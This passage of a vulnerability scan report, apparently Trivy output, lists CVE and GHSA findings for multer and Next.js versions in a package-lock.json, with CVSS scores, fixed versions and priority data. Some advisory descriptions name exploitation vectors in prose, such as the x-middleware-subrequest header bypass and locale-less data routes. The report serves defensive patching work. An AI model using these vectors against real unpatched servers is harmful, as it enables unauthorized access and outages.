UID: 99f2d2a7a48c940f
InstalledVersion: 1.4.5-lts.2
FixedVersion: 2.1.0
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-3304
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:3b0f6823eb0c1e72928cebbdc160db403df646f5c8b21b9a9e90eaccb686a712
Title: 'multer: Multer: Denial of Service via malformed requests'
Description: Multer is a node.js middleware for handling `multipart/form-data`.
A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially causing
resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch.
No known workarounds are available.
Severity: HIGH
CweIDs: *id022
VendorSeverity:
ghsa: 3
nvd: 3
redhat: 3
CVSS:
ghsa:
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
V40Score: 8.7
nvd:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
References:
- https://access.redhat.com/security/cve/CVE-2026-3304
- https://cna.openjsf.org/security-advisories.html
- https://github.com/expressjs/multer
- https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee
- https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p
- https://nvd.nist.gov/vuln/detail/CVE-2026-3304
- https://www.cve.org/CVERecord?id=CVE-2026-3304
PublishedDate: '2026-02-27T16:16:26.38Z'
LastModifiedDate: '2026-03-19T17:28:33.81Z'
context:
sbom:
name: multer
version: 1.4.5-lts.2
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.351066666666668
epss: 0.00019
epss_percentile: 0.05291
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.00076
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 19ed6f114225796d
ruleId: CVE-2026-3520
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'multer: Multer: Denial of Service via malformed requests'
title: CVE-2026-3520
description: Multer is a node.js middleware for handling `multipart/form-data`.
A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially causing stack
overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds
are available.
remediation: https://avd.aquasec.com/nvd/cve-2026-3520
references: []
tags:
- vulnerability
- pkg:multer@1.4.5-lts.2
risk:
cwe: &id023
- CWE-674
raw:
VulnerabilityID: CVE-2026-3520
VendorIDs:
- GHSA-5528-5vmv-3xc2
PkgID: multer@1.4.5-lts.2
PkgName: multer
PkgIdentifier:
PURL: pkg:npm/multer@1.4.5-lts.2
UID: 99f2d2a7a48c940f
InstalledVersion: 1.4.5-lts.2
FixedVersion: 2.1.1
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-3520
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:1aea2a5deada40cd424b21793dc1ffd01b2c216d423aacafc67d0013c6fd0530
Title: 'multer: Multer: Denial of Service via malformed requests'
Description: Multer is a node.js middleware for handling `multipart/form-data`.
A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially causing
stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No
known workarounds are available.
Severity: HIGH
CweIDs: *id023
VendorSeverity:
ghsa: 3
nvd: 3
redhat: 3
CVSS:
ghsa:
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
V40Score: 8.7
nvd:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
References:
- https://access.redhat.com/security/cve/CVE-2026-3520
- https://cna.openjsf.org/security-advisories.html
- https://github.com/expressjs/multer
- https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752
- https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2
- https://nvd.nist.gov/vuln/detail/CVE-2026-3520
- https://www.cve.org/CVERecord?id=CVE-2026-3520
PublishedDate: '2026-03-04T17:16:22.61Z'
LastModifiedDate: '2026-03-09T18:03:23.1Z'
context:
sbom:
name: multer
version: 1.4.5-lts.2
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.39586666666667
epss: 0.00067
epss_percentile: 0.20499
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.00268
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8b483b8e54efe250
ruleId: CVE-2025-29927
severity: CRITICAL
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'nextjs: Authorization Bypass in Next.js Middleware'
title: CVE-2025-29927
description: Next.js is a React framework for building full-stack web applications.
Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and
15.2.3, it is possible to bypass authorization checks within a Next.js application,
if the authorization check occurs in middleware. If patching to a safe version
is infeasible, it is recommend that you prevent external user requests which contain
the x-middleware-subrequest header from reaching your Next.js application. This
vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
remediation: https://avd.aquasec.com/nvd/cve-2025-29927
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id024
- CWE-285
- CWE-863
raw:
VulnerabilityID: CVE-2025-29927
VendorIDs:
- GHSA-f82v-jwr5-mffw
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 13.5.9, 14.2.25, 15.2.3, 12.3.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-29927
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:03d8bc467ed49d9b588625219e50e54133acdb9c588237ee693b8aa0098d1007
Title: 'nextjs: Authorization Bypass in Next.js Middleware'
Description: Next.js is a React framework for building full-stack web applications.
Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and
15.2.3, it is possible to bypass authorization checks within a Next.js application,
if the authorization check occurs in middleware. If patching to a safe version
is infeasible, it is recommend that you prevent external user requests which
contain the x-middleware-subrequest header from reaching your Next.js application.
This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Severity: CRITICAL
CweIDs: *id024
VendorSeverity:
ghsa: 4
redhat: 4
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
V3Score: 9.1
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
V3Score: 9.1
References:
- http://www.openwall.com/lists/oss-security/2025/03/23/3
- http://www.openwall.com/lists/oss-security/2025/03/23/4
- https://access.redhat.com/security/cve/CVE-2025-29927
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2
- https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48
- https://github.com/vercel/next.js/releases/tag/v12.3.5
- https://github.com/vercel/next.js/releases/tag/v13.5.9
- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
- https://jfrog.com/blog/cve-2025-29927-next-js-authorization-bypass/
- https://nvd.nist.gov/vuln/detail/CVE-2025-29927
- https://security.netapp.com/advisory/ntap-20250328-0002
- https://security.netapp.com/advisory/ntap-20250328-0002/
- https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware
- https://www.cve.org/CVERecord?id=CVE-2025-29927
PublishedDate: '2025-03-21T15:15:42.66Z'
LastModifiedDate: '2025-09-10T15:49:40.637Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
owaspTop10_2021:
- A01:2021
cweTop25_2024:
- id: CWE-863
rank: 24
category: Authorization
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 100.0
epss: 0.92118
epss_percentile: 0.99719
is_kev: false
kev_due_date: null
components:
severity_score: 10
epss_multiplier: 4.68472
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 805b9e4959b28bb7
ruleId: CVE-2024-46982
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js Cache Poisoning
title: CVE-2024-46982
description: 'Next.js is a React framework for building full-stack web applications.
By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic
server-side rendered route in the pages router (this does not affect the app router).
When this crafted request is sent it could coerce Next.js to cache a route that
is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate`
header which some upstream CDNs may cache as well. To be potentially affected
all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using
pages router, & 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx`
not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7,
v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce
the issue or not. There are no official or recommended workarounds for this issue,
we recommend that users patch to a safe version.'
remediation: https://avd.aquasec.com/nvd/cve-2024-46982
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id025
- CWE-639
raw:
VulnerabilityID: CVE-2024-46982
VendorIDs:
- GHSA-gp8f-8m3g-qvj9
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 13.5.7, 14.2.10
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-46982
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:8ae6ee9f6abad6c253892c7eafdf3857ac92ffe851cb6c9568fa46323bbc7084
Title: Next.js Cache Poisoning
Description: 'Next.js is a React framework for building full-stack web applications.
By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic
server-side rendered route in the pages router (this does not affect the app
router). When this crafted request is sent it could coerce Next.js to cache
a route that is meant to not be cached and send a `Cache-Control: s-maxage=1,
stale-while-revalidate` header which some upstream CDNs may cache as well. To
be potentially affected all of the following must apply: 1. Next.js between
13.5.1 and 14.2.9, 2. Using pages router, & 3. Using non-dynamic server-side
rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This
vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend
upgrading regardless of whether you can reproduce the issue or not. There are
no official or recommended workarounds for this issue, we recommend that users
patch to a safe version.'
Severity: HIGH
CweIDs: *id025
VendorSeverity:
ghsa: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
V3Score: 7.5
V40Score: 8.7
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3
- https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda
- https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9
- https://nvd.nist.gov/vuln/detail/CVE-2024-46982
PublishedDate: '2024-09-17T22:15:02.273Z'
LastModifiedDate: '2025-09-10T15:46:05.173Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
owaspTop10_2021:
- A01:2021
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 69.12453333333335
epss: 0.49062
epss_percentile: 0.97812
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 2.9624800000000002
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ea84684553ce61ab
ruleId: CVE-2024-51479
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'next.js: next: authorization bypass in Next.js'
title: CVE-2024-51479
description: 'Next.js is a React framework for building full-stack web applications.
In affected versions if a Next.js application is performing authorization in middleware
based on pathname, it was possible for this authorization to be bypassed for pages
directly under the application''s root directory. For example: * [Not affected]
`https://example.com/` * [Affected] `https://example.com/foo` * [Not affected]
`https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and
later. If your Next.js application is hosted on Vercel, this vulnerability has
been automatically mitigated, regardless of Next.js version. There are no official
workarounds for this vulnerability.'
remediation: https://avd.aquasec.com/nvd/cve-2024-51479
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id026
- CWE-285
- CWE-863
raw:
VulnerabilityID: CVE-2024-51479
VendorIDs:
- GHSA-7gfc-8cq8-jh5f
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 14.2.15
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-51479
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:ffe1fe8cd242722c48ed9d1d21d64c4678d5fece8d35a42fb15072938ea11c55
Title: 'next.js: next: authorization bypass in Next.js'
Description: 'Next.js is a React framework for building full-stack web applications.
In affected versions if a Next.js application is performing authorization in
middleware based on pathname, it was possible for this authorization to be bypassed
for pages directly under the application''s root directory. For example: * [Not
affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not
affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15`
and later. If your Next.js application is hosted on Vercel, this vulnerability
has been automatically mitigated, regardless of Next.js version. There are no
official workarounds for this vulnerability.'
Severity: HIGH
CweIDs: *id026
VendorSeverity:
ghsa: 3
redhat: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
V3Score: 7.5
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
V3Score: 7.5
References:
- https://access.redhat.com/security/cve/CVE-2024-51479
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b
- https://github.com/vercel/next.js/releases/tag/v14.2.15
- https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f
- https://nvd.nist.gov/vuln/detail/CVE-2024-51479
- https://www.cve.org/CVERecord?id=CVE-2024-51479
PublishedDate: '2024-12-17T19:15:06.697Z'
LastModifiedDate: '2025-09-10T15:48:08.253Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
owaspTop10_2021:
- A01:2021
cweTop25_2024:
- id: CWE-863
rank: 24
category: Authorization
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 96.60839999999999
epss: 0.78509
epss_percentile: 0.99056
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 4.140359999999999
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 668e2a15050688ec
ruleId: CVE-2026-44573
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js has a Middleware / Proxy bypass in Pages Router applications using
i18n
title: CVE-2026-44573
description: Next.js is a React framework for building full-stack web applications.
From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router
with i18n configured and middleware/proxy-based authorization can allow unauthorized
access to protected page data through locale-less /_next/data/<buildId>/<page>.json
requests. In affected configurations, middleware does not run for the unprefixed
data route, allowing an attacker to retrieve SSR JSON for protected pages without
passing the intended authorization checks. This vulnerability is fixed in 15.5.16
and 16.2.5.
remediation: https://avd.aquasec.com/nvd/cve-2026-44573
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id027
- CWE-863
raw:
VulnerabilityID: CVE-2026-44573
VendorIDs:
- GHSA-36qx-fr4f-26g5
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.5.16, 16.2.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44573
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:bd9906f4d5b485ab232b2dbc5a0fba6ec53cd6439edf9b78c2790429b6f3bb2d
Title: Next.js has a Middleware / Proxy bypass in Pages Router applications using
i18n
Description: Next.js is a React framework for building full-stack web applications.
From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router
with i18n configured and middleware/proxy-based authorization can allow unauthorized
access to protected page data through locale-less /_next/data/<buildId>/<page>.json
requests. In affected configurations, middleware does not run for the unprefixed
data route, allowing an attacker to retrieve SSR JSON for protected pages without
passing the intended authorization checks. This vulnerability is fixed in 15.5.16
and 16.2.5.
Severity: HIGH
CweIDs: *id027
VendorSeverity:
ghsa: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
V3Score: 7.5
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/releases/tag/v15.5.16
- https://github.com/vercel/next.js/releases/tag/v16.2.5
- https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5
- https://nvd.nist.gov/vuln/detail/CVE-2026-44573
PublishedDate: '2026-05-13T17:16:22.627Z'
LastModifiedDate: '2026-05-14T12:24:22.91Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
owaspTop10_2021:
- A01:2021
cweTop25_2024:
- id: CWE-863
rank: 24
category: Authorization
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.381866666666667
epss: 0.00052
epss_percentile: 0.1631
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.00208
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6cbf7b1b47550df1
ruleId: CVE-2026-44578
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js vulnerable to server-side request forgery in applications using
WebSocket upgrades
title: CVE-2026-44578
description: Next.js is a React framework for building full-stack web applications.
From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the
built-in Node.js server can be vulnerable to server-side request forgery through
crafted WebSocket upgrade requests. An attacker can cause the server to proxy
requests to arbitrary internal or external destinations, which may expose internal
services or cloud metadata endpoints. Vercel-hosted deployments are not affected.
This vulnerability is fixed in 15.5.16 and 16.2.5.
remediation: https://avd.aquasec.com/nvd/cve-2026-44578
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id028
- CWE-918
raw:
VulnerabilityID: CVE-2026-44578
VendorIDs:
- GHSA-c4j6-fc7j-m34r
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.5.16, 16.2.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44578
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:4b00929401561b3189dd6335cdbb89b9957345f4d80a9420d54dbe8defe083a4
Title: Next.js vulnerable to server-side request forgery in applications using
WebSocket upgrades
Description: Next.js is a React framework for building full-stack web applications.
From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the
built-in Node.js server can be vulnerable to server-side request forgery through
crafted WebSocket upgrade requests. An attacker can cause the server to proxy
requests to arbitrary internal or external destinations, which may expose internal
services or cloud metadata endpoints. Vercel-hosted deployments are not affected.
This vulnerability is fixed in 15.5.16 and 16.2.5.
Severity: HIGH
CweIDs: *id028
VendorSeverity:
ghsa: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
V3Score: 8.6
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/releases/tag/v15.5.16
- https://github.com/vercel/next.js/releases/tag/v16.2.5
- https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r
- https://nvd.nist.gov/vuln/detail/CVE-2026-44578
PublishedDate: '2026-05-13T18:16:17.99Z'
LastModifiedDate: '2026-05-14T18:34:38.53Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
owaspTop10_2021:
- A10:2021
cweTop25_2024:
- id: CWE-918
rank: 19
category: SSRF
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 27.510933333333334
epss: 0.04476
epss_percentile: 0.89216
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.17904
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 091bd6d2c4384d47
ruleId: GHSA-5j59-xgg2-r9c4
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up
title: GHSA-5j59-xgg2-r9c4
description: "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956)\
\ in React Server Components was incomplete and did not fully mitigate denial-of-service\
\ conditions across all payload types. As a result, certain crafted inputs could\
\ still trigger excessive resource consumption. \n\nThis vulnerability affects\
\ React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle\
\ or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when\
\ using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\
\nA malicious actor can send a specially crafted HTTP request to a Server Function\
\ endpoint that, when deserialized, causes the React Server Components runtime\
\ to enter an infinite loop. This can lead to sustained CPU consumption and cause\
\ the affected server process to become unresponsive, resulting in a denial-of-service\
\ condition in unpatched environments."
remediation: https://github.com/advisories/GHSA-5j59-xgg2-r9c4
references: []
tags:
- vulnerability
- pkg:next@14.2.3
raw:
VulnerabilityID: GHSA-5j59-xgg2-r9c4
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 14.2.35, 15.0.7, 15.1.11, 15.2.8, 15.3.8, 15.4.10, 15.5.9, 15.6.0-canary.60,
16.0.10, 16.1.0-canary.19
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://github.com/advisories/GHSA-5j59-xgg2-r9c4
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:c465b7761effe6b822ac2a802014aa01002d62640427a73b62a2a571e081fe24
Title: Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up
Description: "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956)\
\ in React Server Components was incomplete and did not fully mitigate denial-of-service\
\ conditions across all payload types. As a result, certain crafted inputs\
\ could still trigger excessive resource consumption. \n\nThis vulnerability\
\ affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that\
\ bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and\
\ 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\
\nA malicious actor can send a specially crafted HTTP request to a Server Function\
\ endpoint that, when deserialized, causes the React Server Components runtime\
\ to enter an infinite loop. This can lead to sustained CPU consumption and\
\ cause the affected server process to become unresponsive, resulting in a denial-of-service\
\ condition in unpatched environments."
Severity: HIGH
VendorSeverity:
ghsa: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4
- https://nextjs.org/blog/security-update-2025-12-11
- https://nvd.nist.gov/vuln/detail/CVE-2025-67779
- https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
- https://www.cve.org/CVERecord?id=CVE-2025-55184
- https://www.facebook.com/security/advisories/cve-2025-67779
PublishedDate: '2025-12-12T17:21:57Z'
LastModifiedDate: '2026-01-15T21:55:04Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.333333333333336
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2dd16d93f72241ba
ruleId: GHSA-8h8q-6873-q5fj
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js Vulnerable to Denial of Service with Server Components
title: GHSA-8h8q-6873-q5fj
description: "A vulnerability affects certain React Server Components packages for\
\ versions 19.x and frameworks that use the affected packages, including Next.js\
\ 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream\
\ as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh).\
\ \n\nA specially crafted HTTP request can be sent to any App Router Server Function\
\ endpoint that, when deserialized, may trigger excessive CPU usage. This can\
\ result in denial of service in unpatched environments."
remediation: https://github.com/advisories/GHSA-8h8q-6873-q5fj
references: []
tags:
- vulnerability
- pkg:next@14.2.3
raw:
VulnerabilityID: GHSA-8h8q-6873-q5fj
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.5.16, 16.2.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://github.com/advisories/GHSA-8h8q-6873-q5fj
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:92e1aa37bcc2db1c15708088885b76cf9ca9d3d8c1fc2283d064ff5d037c3529
Title: Next.js Vulnerable to Denial of Service with Server Components
Description: "A vulnerability affects certain React Server Components packages\
\ for versions 19.x and frameworks that use the affected packages, including\
\ Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked\
\ upstream as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh).\
\ \n\nA specially crafted HTTP request can be sent to any App Router Server\
\ Function endpoint that, when deserialized, may trigger excessive CPU usage.\
\ This can result in denial of service in unpatched environments."
Severity: HIGH
VendorSeverity:
ghsa: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
References:
- https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj
- https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-w94c-4vhp-22gx
- https://nvd.nist.gov/vuln/detail/CVE-2026-23870
PublishedDate: '2026-05-11T14:50:27Z'
LastModifiedDate: '2026-05-11T14:50:27Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.333333333333336
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3cc6d1d18936ff7b
ruleId: GHSA-h25m-26qc-wcjf
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js HTTP request deserialization can lead to DoS when using insecure
React Server Components
title: GHSA-h25m-26qc-wcjf
description: 'A vulnerability affects certain React Server Components packages for
